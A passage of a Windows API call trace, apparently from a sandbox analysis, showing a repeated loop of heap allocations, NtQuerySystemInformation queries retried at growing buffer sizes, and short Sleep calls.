hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.254] Sleep (dwMilliseconds=0x110) [0208.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.269] Sleep (dwMilliseconds=0x110) [0208.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.285] Sleep (dwMilliseconds=0x110) [0208.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.302] Sleep (dwMilliseconds=0x110) [0208.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.318] Sleep (dwMilliseconds=0x110) [0208.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.332] Sleep (dwMilliseconds=0x110) [0208.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.349] Sleep (dwMilliseconds=0x110) [0208.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.368] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.371] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.373] Sleep (dwMilliseconds=0x110) [0208.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.392] Sleep (dwMilliseconds=0x110) [0208.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.409] Sleep (dwMilliseconds=0x110) [0208.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.434] Sleep (dwMilliseconds=0x110) [0208.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.457] Sleep (dwMilliseconds=0x110) [0208.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.478] Sleep (dwMilliseconds=0x110) [0208.481] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.481] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.487] Sleep (dwMilliseconds=0x110) [0208.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) 